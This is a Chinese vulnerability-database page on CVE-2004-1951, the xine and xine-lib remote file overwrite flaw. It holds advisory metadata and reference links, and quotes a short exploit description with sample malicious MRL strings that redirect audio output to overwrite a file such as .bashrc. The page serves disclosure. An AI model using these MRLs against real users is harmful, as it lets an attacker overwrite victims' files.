Xine和Xine-Lib多个远程文件覆盖漏洞-安全小百科

Xine和Xine-Lib多个远程文件覆盖漏洞

漏洞ID	1107898	漏洞类型	设计错误
发布时间	2004-04-22	更新时间	2005-10-20
CVE编号	CVE-2004-1951	CNNVD-ID	CNNVD-200412-737
漏洞平台	Linux	CVSS评分	5.0

|漏洞来源

https://www.exploit-db.com/exploits/24038
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-737

|漏洞详情

Xine是Linux系统下播放VCD/DVD的程序。Xine-lib媒体播放器在打开恶意MRL时存在问题，远程攻击者可以利用这个漏洞以应用程序进程覆盖任意内容到系统任意文件中。MRLs(mediaresourcelocator)是xine-lib库使用的URI用于描述要播放的内容位置，MRLS也提供多个功能提供xine配置选项，这些选项在播放之前被使用，但是部分xine配置指定文件选项在重放过程中会被写入内容，如”audio.sun_audio_device”指定SUN机器上的音频设备，音频流的解码PCM样例会写入到这个文件。通过用户打开类似如下MRL：”http://myserver/mybashrc#audio.sun_audio_device:.bashrc”更改”audio.sun_audio_device”选项值并播放特殊构建音频流，攻击者可覆盖系统文件，导致产生拒绝服务。

|漏洞EXP

source: http://www.securityfocus.com/bid/10193/info

It has been reported that the xine media player and the xine media library are affected by multiple remote file overwrite vulnerabilities. This is due to a design error that allows various media resource file configurations to write to arbitrary files.

It is possible to set these configuration parameters to write to arbitrary files on the affected system. It should be noted that this issue, as it is currently known, only affects Sun based systems as well as those using the DXR3 or Hollywood+ MPEG decoder audio card. It has been conjectured however that similar configuration parameters exists that affect other systems.

The configuration syntax:

"cfg:/audio.sun_audio_device:targetFile" 

If followed by the entry:

"http://www.example.com/attackerSpecifiedFile"

Will cause the attacker specified file to be written to the target file.

|参考资料

来源:BID
名称:10193
链接:http://www.securityfocus.com/bid/10193
来源:GENTOO
名称:GLSA-200404-20
链接:http://security.gentoo.org/glsa/glsa-200404-20.xml
来源:XF
名称:xine-mrl-file-overwrite(15939)
链接:http://xforce.iss.net/xforce/xfdb/15939
来源:www.xinehq.de
链接:http://www.xinehq.de/index.php/security/XSA-2004-2
来源:www.xinehq.de
链接:http://www.xinehq.de/index.php/security/XSA-2004-1
来源:SLACKWARE
名称:SSA:2004-111
链接:http://www.slackware.com/security/viewer.php?l=slackware-security&y;=2004&m;=slackware-security.372791
来源:SECUNIA
名称:11433
链接:http://secunia.com/advisories/11433
来源:OSVDB
名称:5739
链接:http://www.osvdb.org/5739
来源:OSVDB
名称:5594
链接:http://www.osvdb.org/5594
来源：NSFOCUS
名称：6367
链接：http://www.nsfocus.net/vulndb/6367

相关推荐: Multiple Vendor RPC Denial of Service Vulnerability

Multiple Vendor RPC Denial of Service Vulnerability 漏洞ID 1104862 漏洞类型 Design Error 发布时间 1998-11-13 更新时间 1998-11-13 CVE编号 N/A CNNVD…

文章版权归作者所有，未经允许请勿转载。

THE END